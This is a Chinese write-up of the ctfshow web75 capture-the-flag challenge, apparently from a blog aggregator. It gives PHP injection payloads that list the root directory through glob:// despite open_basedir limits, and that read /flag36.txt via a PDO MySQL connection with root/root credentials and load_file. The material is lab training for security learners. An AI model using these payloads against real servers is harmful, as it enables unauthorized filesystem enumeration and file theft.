当前位置: 首页 > news >正文

[ctfshow web入门] web75

信息收集

scandir被禁用了

解题

c=foreach(new DirectoryIterator("glob:///*") as $a){echo($a->__toString().' ');
}
ob_flush();
c=if ( $a = opendir("glob:///*") ) {while ( ($file = readdir($a)) !== false ) {echo $file."<br>";}closedir($a);ob_flush();
}

在这里插入图片描述

又有open_basedir限制了
web72里那一大坨代码也不能用了,估计开启了ASLR GS之类的堆栈保护
答案给了新的方法

c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root');foreach($dbh->query('select load_file("/flag36.txt")') as $row){echo($row[0])."\n<br>"; }$dbh = null;
}catch (PDOException $e) {echo $e->getMessage();exit(0);
}exit(0);

在代码里写注释有时会使代码失效

PDO:(PHP数据对象)是PHP的一个轻量级数据库访问抽象层,允许开发者以一种统一的方式访问多种不同类型的数据库,如MySQL、PostgreSQL、SQLite等。

PDO::query: 执行 SQL 语句,返回PDOStatement对象

select load_file:使用了mysql的load_file函数

load_file:函数允许从服务器的文件系统中读取文件,并将其内容作为字符串返回。然而,这个函数需要满足一定的权限条件,并且文件路径必须是服务器能够访问的

这些都不是关键,关键是数据库名、账号、密码怎么来的,如果不是答案给了,根本不知道
在这里插入图片描述


web    目录    web

http://www.dtcms.com/a/192273.html

相关文章:

  • 【落羽的落羽 C++】进一步认识模板
  • 代驾小程序订单系统框架搭建
  • 18.中介者模式:思考与解读
  • Android Studio中Gradle中Task列表显示不全解决方案
  • 多平台图标设计与管理的终极解决方案
  • 【linux】open欧拉安装显卡驱动以及cuda12.8
  • 制造业工厂的三大核心系统:ERP+PLM+MES
  • springboot AOP中,通过解析SpEL 表达式动态获取参数值
  • 使用WebSocket实现跨多个服务器传输音频及实时语音识别
  • spark和hadoop之间的区别和联系
  • 以项目的方式学QT开发(一)
  • VisionPro斑点寻找工具Blob
  • MyBatis:从入门到深度理解
  • 深度解析 IDEA 集成 Continue 插件:提升开发效率的全流程指南
  • 【python基础知识】Day26 函数
  • Yeoman实战指南:从零打造自定义项目生成器
  • 人工智能100问☞第23问:卷积神经网络(CNN)为何擅长图像处理?
  • 最新网盘资源搜索系统,电视直播,Alist聚合播放
  • QMK固件OLED显示屏配置教程:从零开始实现个性化键盘显示(实操部分)
  • DevExpressWinForms-TreeList-数据绑定
  • 如何在Edge浏览器里-安装梦精灵AI提示词管理工具
  • OrangePi Zero 3学习笔记(Android篇)10 - SPI和从设备
  • 二程运输的干散货船路径优化
  • 2025年山东省数学建模F题思路
  • 精益数据分析(61/126):移情阶段评分体系构建与实战案例解析
  • MySQL 用户权限管理:从入门到精通
  • 2025年5月-信息系统项目管理师高级-软考高项-成本计算题
  • WebSocket:实时通信(如聊天应用)从零到一的深度解析
  • Cursor打开的文件中文乱码,应该怎么设置
  • 提高绳牵引并联连续体机器人运动学建模精度的基于Transformer的分段学习方法